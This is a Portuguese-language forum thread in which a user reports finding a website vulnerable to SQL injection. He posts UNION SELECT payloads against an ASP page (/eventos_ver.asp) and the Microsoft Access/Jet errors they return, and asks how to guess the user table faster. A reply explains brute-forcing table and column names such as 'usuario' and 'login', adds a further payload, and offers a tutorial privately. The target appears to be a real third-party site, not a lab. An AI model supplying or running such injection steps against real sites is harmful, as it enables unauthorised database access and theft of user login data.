SQL injector! - Jet não encontrou a tabela de entrada

[oliveiravictorr]

bem galera e o seguinte to com um site aqui vul sql injector, coloco essa aqui union+all+select+1,2,3,4,5,6,7 o site me mando esse erro aqui

Microsoft OLE DB Provider for ODBC Drivers erro '80004005'

[Microsoft][Driver ODBC para Microsoft Access] A entrada de uma consulta deve ter pelo menos uma tabela ou consulta.

/eventos_ver.asp, line 48

ai nao sei oque ta avento, depois disso eu tento usar desse jeito

union+all+select+1,login,2,3,4,5,6,7+from+usuario e o site me responde assim

Microsoft OLE DB Provider for ODBC Drivers erro '80040e37'

[Microsoft][Driver ODBC para Microsoft Access] O mecanismo de banco de dados Microsoft Jet não encontrou a tabela de entrada ou consulta 'usuario'. Certifique-se de que ela existe e de que seu nome está digitado corretamente.

/eventos_ver.asp, line 48 quero saber se eu tenho que ficar trocando o "usuario" por outro tipo ate acertar, ou tem um jeito mais rapido?

quem ajudar ai vlw!

[_Mlk_]

Isso é um bug no odbc sql acess mano...procura alguma coisa aprofundando sobre o msm.

Mas dando um help ligeiro, voce tem que achar o nome da possivel tabela e depois a quantidade de colunas dela...e por fim chutar ( brute ) o nome dessas strings .

Por exemplo quando voce "busca" na query a tabela de nome 'usuario' , ele lhe retorna o erro o erro postado...portanto voce tem que tentar outras strings.
nome,login,logins,amdin, etc...

union+select+0+from+usuario

Microsoft OLE DB Provider for ODBC Drivers erro '80040e37'

[Microsoft][Driver ODBC para Microsoft Access] O mecanismo de banco de dados Microsoft Jet não encontrou a tabela de entrada ou consulta 'usuario'. Certifique-se de que ela existe e de que seu nome está digitado corretamente.
/eventos_ver.asp, line 48

=]

Eu fiz um tuto se quiser só pedir pelo MP , não posto aqui pq esta em outro lugar e acho que pode ser spam.

;)

Abraços